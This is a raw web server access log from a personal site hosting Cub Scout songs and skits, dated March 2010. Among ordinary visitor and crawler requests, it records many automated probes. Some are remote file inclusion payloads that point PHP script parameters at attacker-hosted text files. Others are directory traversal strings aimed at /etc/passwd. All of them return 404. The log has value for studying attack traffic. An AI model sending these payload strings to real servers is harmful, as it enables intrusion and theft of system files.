136.181.195.8 - - [01/Mar/2010:10:14:02 -0800] "GET /%7Edaveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/%7Edaveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 0 www.accesscom.com
110.45.145.178 - - [01/Mar/2010:10:16:22 -0800] "GET /~daveh///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 339 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
110.45.145.178 - - [01/Mar/2010:10:16:26 -0800] "GET /~daveh/logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 344 /home/users/d/daveh/public_html/logs///administrator "-" "Mozilla/5.0" 0 www.accesscom.com
110.45.145.178 - - [01/Mar/2010:10:16:26 -0800] "GET /~daveh/logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 357 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
70.168.88.100 - - [01/Mar/2010:10:16:58 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MCBCC; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; MCBCC)" 0 w
70.168.88.100 - - [01/Mar/2010:10:16:58 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MCBCC; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; MCBCC)" 0 www.accesscom.
70.168.88.100 - - [01/Mar/2010:10:16:58 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.google.com/search?q=pirate+camp+skit&rls=com.microsoft:en-us:IE-SearchBox&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7ADBF_en" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MCBCC; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR
136.181.195.8 - - [01/Mar/2010:10:18:04 -0800] "GET /%7Edaveh/sean/song/pbsong0.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.bing.com/search?FORM=sCPN&RS=CHECKED&un=doc&v=1&q=%22cub%20scout%22%20songbook&adlt=strict" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.
136.181.195.8 - - [01/Mar/2010:10:18:04 -0800] "GET /%7Edaveh/sean/song/new.gif HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/%7Edaveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 0 www.accesscom.com
67.195.115.58 - - [01/Mar/2010:10:18:48 -0800] "GET /~daveh/sean/monty/york.txt HTTP/1.0" 200 3624 /home/users/d/daveh/public_html/sean/monty/york.txt "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
207.46.204.230 - - [01/Mar/2010:10:27:42 -0800] "GET /~daveh/sean/song/pbsong1.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/pbsong1.html "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:10:38:57 -0800] "GET /~daveh//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:10:38:57 -0800] "GET /~daveh/logs//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 319 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:10:38:57 -0800] "GET /~daveh/logs/access.log//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
110.45.145.178 - - [01/Mar/2010:10:39:15 -0800] "GET /~daveh/logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 355 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
66.103.131.81 - - [01/Mar/2010:10:40:58 -0800] "GET /~daveh/logs/access.log%20//board/bbs/delete_all.php?board_skin_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 329 /home/users/d/daveh/public_html/logs/access.log "-" "-" 0 www.accesscom.com
66.103.131.81 - - [01/Mar/2010:10:40:58 -0800] "GET /~daveh/logs/access.log%20//board/bbs/delete_all.php?board_skin_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 329 /home/users/d/daveh/public_html/logs/access.log "-" "-" 0 www.accesscom.com
66.103.131.81 - - [01/Mar/2010:10:40:59 -0800] "GET /~daveh/logs//board/bbs/delete_all.php?board_skin_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 317 /home/users/d/daveh/public_html/logs//board "-" "-" 0 www.accesscom.com
66.103.131.81 - - [01/Mar/2010:10:40:59 -0800] "GET /~daveh/logs//board/bbs/delete_all.php?board_skin_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 317 /home/users/d/daveh/public_html/logs//board "-" "-" 0 www.accesscom.com
67.195.115.58 - - [01/Mar/2010:10:51:01 -0800] "GET /~daveh/sean/monty/camelot.txt HTTP/1.0" 200 988 /home/users/d/daveh/public_html/sean/monty/camelot.txt "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
65.55.231.94 - - [01/Mar/2010:10:55:38 -0800] "GET /~daveh/martin/images/DSC00027.jpg HTTP/1.1" 200 123967 /home/users/d/daveh/public_html/martin/images/DSC00027.jpg "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
65.55.231.94 - - [01/Mar/2010:10:55:39 -0800] "GET /~daveh/martin/pages/DSC00027.htm HTTP/1.1" 200 1097 /home/users/d/daveh/public_html/martin/pages/DSC00027.htm "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:10:59:55 -0800] "GET /~daveh/logs//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:10:59:55 -0800] "GET /~daveh/logs/access.log//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 322 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:10:59:55 -0800] "GET /~daveh//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:11:04:17 -0800] "GET /~daveh//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:11:04:17 -0800] "GET /~daveh/logs//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:11:04:17 -0800] "GET /~daveh/logs/access.log//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 322 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:11:06:18 -0800] "GET /~daveh//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:11:06:18 -0800] "GET /~daveh/logs//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 319 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:11:06:18 -0800] "GET /~daveh/logs/access.log%20%20//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 332 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
66.103.131.81 - - [01/Mar/2010:11:14:48 -0800] "GET /~daveh/logs/access.log%20//phpsecurityadmin/include/logout.php?PSA_PATH=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 340 /home/users/d/daveh/public_html/logs/access.log "-" "-" 0 www.accesscom.com
66.103.131.81 - - [01/Mar/2010:11:14:48 -0800] "GET /~daveh/logs//phpsecurityadmin/include/logout.php?PSA_PATH=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 328 /home/users/d/daveh/public_html/logs//phpsecurityadmin "-" "-" 0 www.accesscom.com
66.103.131.81 - - [01/Mar/2010:11:14:48 -0800] "GET /~daveh/logs/access.log%20//phpsecurityadmin/include/logout.php?PSA_PATH=./../../../../../../../../etc/passwd HTTP/1.1" 404 340 /home/users/d/daveh/public_html/logs/access.log "-" "-" 0 www.accesscom.com
66.103.131.81 - - [01/Mar/2010:11:14:49 -0800] "GET /~daveh/logs//phpsecurityadmin/include/logout.php?PSA_PATH=./../../../../../../../../etc/passwd HTTP/1.1" 404 328 /home/users/d/daveh/public_html/logs//phpsecurityadmin "-" "-" 0 www.accesscom.com
65.55.67.180 - - [01/Mar/2010:11:16:53 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.0" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.bing.com/search?q=Scout+Songs%2F+Aint+gonna+rain+no+more&go=&form=QBRE&qs=n" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; PeoplePal 7.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Zune 4.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0; MSNb
65.55.67.180 - - [01/Mar/2010:11:16:54 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.0" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; PeoplePal 7.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Zune 4.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0; MSNbMSNI; MSNmen-us; MSNcIA)" 0 www.accesscom.com
65.55.67.180 - - [01/Mar/2010:11:17:36 -0800] "GET /~daveh/sean/song/pbsong3.html HTTP/1.0" 200 65639 /home/users/d/daveh/public_html/sean/song/pbsong3.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; PeoplePal 7.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Zune 4.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0; MSNbMSNI; MSNmen-us; MSNcIA)" 1 www.
220.80.108.81 - - [01/Mar/2010:11:19:06 -0800] "GET /~daveh//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:11:19:06 -0800] "GET /~daveh/logs//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:11:19:06 -0800] "GET /~daveh/logs/access.log%20%20//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [01/Mar/2010:11:19:15 -0800] "GET /~daveh/logs/access.log%20%20//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [01/Mar/2010:11:20:23 -0800] "GET /~daveh//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/skin_shop "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [01/Mar/2010:11:20:24 -0800] "GET /~daveh/logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 347 /home/users/d/daveh/public_html/logs//skin_shop "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [01/Mar/2010:11:20:24 -0800] "GET /~daveh/logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 360 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
85.12.33.30 - - [01/Mar/2010:11:20:27 -0800] "GET /~daveh/logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs//wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
85.12.33.30 - - [01/Mar/2010:11:20:27 -0800] "GET /~daveh/logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 367 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
85.12.33.30 - - [01/Mar/2010:11:20:27 -0800] "GET /~daveh//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 349 /home/users/d/daveh/public_html/wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
85.12.33.30 - - [01/Mar/2010:11:20:27 -0800] "GET /~daveh//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 349 /home/users/d/daveh/public_html/wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
85.12.33.30 - - [01/Mar/2010:11:20:27 -0800] "GET /~daveh/logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs//wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
85.12.33.30 - - [01/Mar/2010:11:20:27 -0800] "GET /~daveh/logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 367 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
85.12.33.30 - - [01/Mar/2010:11:20:56 -0800] "GET /~daveh//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 349 /home/users/d/daveh/public_html/wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
85.12.33.30 - - [01/Mar/2010:11:20:56 -0800] "GET /~daveh/logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs//wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
85.12.33.30 - - [01/Mar/2010:11:20:57 -0800] "GET /~daveh/logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 365 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
85.12.33.30 - - [01/Mar/2010:11:21:01 -0800] "GET /~daveh//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 349 /home/users/d/daveh/public_html/wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
85.12.33.30 - - [01/Mar/2010:11:21:01 -0800] "GET /~daveh/logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs//wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
85.12.33.30 - - [01/Mar/2010:11:21:01 -0800] "GET /~daveh/logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 365 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [01/Mar/2010:11:21:13 -0800] "GET /~daveh/logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 360 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [01/Mar/2010:11:21:13 -0800] "GET /~daveh/logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 347 /home/users/d/daveh/public_html/logs//skin_shop "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [01/Mar/2010:11:21:13 -0800] "GET /~daveh//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/skin_shop "-" "Mozilla/5.0" 0 www.accesscom.com
75.101.173.154 - - [01/Mar/2010:11:25:33 -0800] "GET /%7Edaveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" 0 www.accesscom.com
75.101.173.154 - - [01/Mar/2010:11:26:01 -0800] "GET /%7Edaveh/sean/song/pbsong2.html HTTP/1.1" 200 54080 /home/users/d/daveh/public_html/sean/song/pbsong2.html "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" 0 www.accesscom.com
75.101.173.154 - - [01/Mar/2010:11:26:02 -0800] "GET /%7Edaveh/sean/song/index.html HTTP/1.1" 404 307 /home/users/d/daveh/public_html/sean/song/index.html "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" 0 www.accesscom.com
75.101.173.154 - - [01/Mar/2010:11:26:03 -0800] "GET /%7Edaveh/sean/song/pbsong1.html HTTP/1.1" 200 41905 /home/users/d/daveh/public_html/sean/song/pbsong1.html "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" 1 www.accesscom.com
219.150.205.155 - - [01/Mar/2010:11:36:28 -0800] "GET /~daveh/logs/access.log/administrator/components/com_extcalendar/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" 0 www.accesscom.com
219.150.205.155 - - [01/Mar/2010:11:36:32 -0800] "GET /~daveh/logs/administrator/components/com_extcalendar/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs/administrator "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" 0 www.accesscom.com
58.150.99.144 - - [01/Mar/2010:11:40:25 -0800] "GET /~daveh/logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs//wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
58.150.99.144 - - [01/Mar/2010:11:40:25 -0800] "GET /~daveh//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 349 /home/users/d/daveh/public_html/wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
58.150.99.144 - - [01/Mar/2010:11:40:25 -0800] "GET /~daveh/logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 367 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
58.150.99.144 - - [01/Mar/2010:11:41:01 -0800] "GET /~daveh//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 349 /home/users/d/daveh/public_html/wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
58.150.99.144 - - [01/Mar/2010:11:41:01 -0800] "GET /~daveh/logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs//wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
58.150.99.144 - - [01/Mar/2010:11:41:01 -0800] "GET /~daveh/logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 367 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
66.103.131.81 - - [01/Mar/2010:11:45:41 -0800] "GET /~daveh/logs/access.log%20//board/bbs/write_update.php?board_skin_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 331 /home/users/d/daveh/public_html/logs/access.log "-" "-" 0 www.accesscom.com
66.103.131.81 - - [01/Mar/2010:11:45:41 -0800] "GET /~daveh/logs//board/bbs/write_update.php?board_skin_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 319 /home/users/d/daveh/public_html/logs//board "-" "-" 0 www.accesscom.com
66.103.131.81 - - [01/Mar/2010:11:45:43 -0800] "GET /~daveh/logs//board/bbs/write_update.php?board_skin_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 319 /home/users/d/daveh/public_html/logs//board "-" "-" 0 www.accesscom.com
66.103.131.81 - - [01/Mar/2010:11:45:43 -0800] "GET /~daveh/logs/access.log%20//board/bbs/write_update.php?board_skin_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 331 /home/users/d/daveh/public_html/logs/access.log "-" "-" 0 www.accesscom.com
169.199.155.65 - - [01/Mar/2010:11:47:22 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.0" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" 0 www.accesscom.com
169.199.155.65 - - [01/Mar/2010:11:47:22 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.0" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" 0 www.accesscom.com
169.199.155.65 - - [01/Mar/2010:11:47:22 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.0" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.google.com/url?sa=t&source=web&ct=res&cd=1&ved=0CAYQFjAA&url=http%3A%2F%2Fwww.accesscom.com%2F~daveh%2Fsean%2Fsong%2Fsongskit.html&rct=j&q=boy+scout+cheers&ei=yBmMS4vTDYK0sgP_7ayGAw&usg=AFQjCNEezqVqzbNdeCH3cpG-kQagNKfmbA" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14)
67.195.115.58 - - [01/Mar/2010:11:49:04 -0800] "GET /~daveh/logs/Jul02.html HTTP/1.0" 200 14194 /home/users/d/daveh/public_html/logs/Jul02.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
208.115.111.248 - - [01/Mar/2010:11:51:25 -0800] "GET /~daveh/sean/song/pbsong1.html HTTP/1.1" 200 41905 /home/users/d/daveh/public_html/sean/song/pbsong1.html "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 0 www.accesscom.com
208.115.111.248 - - [01/Mar/2010:11:51:27 -0800] "GET /~daveh/sean/song/pbsong2.html HTTP/1.1" 200 54080 /home/users/d/daveh/public_html/sean/song/pbsong2.html "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 0 www.accesscom.com
208.115.111.248 - - [01/Mar/2010:11:51:30 -0800] "GET /~daveh/sean/song/pbsong3.html HTTP/1.1" 200 65639 /home/users/d/daveh/public_html/sean/song/pbsong3.html "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 0 www.accesscom.com
208.115.111.248 - - [01/Mar/2010:11:51:33 -0800] "GET /~daveh/sean/song/pbsong4.html HTTP/1.1" 200 59712 /home/users/d/daveh/public_html/sean/song/pbsong4.html "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 1 www.accesscom.com
208.115.111.248 - - [01/Mar/2010:11:51:35 -0800] "GET /~daveh/sean/song/pbsong5.html HTTP/1.1" 200 13272 /home/users/d/daveh/public_html/sean/song/pbsong5.html "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 0 www.accesscom.com
208.115.111.248 - - [01/Mar/2010:11:51:38 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 0 www.accesscom.com
87.106.132.3 - - [01/Mar/2010:11:53:06 -0800] "GET /~daveh/mygallerybrowser.php?myPath=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 307 /home/users/d/daveh/public_html/mygallerybrowser.php "-" "Mozilla/5.0" 0 www.accesscom.com
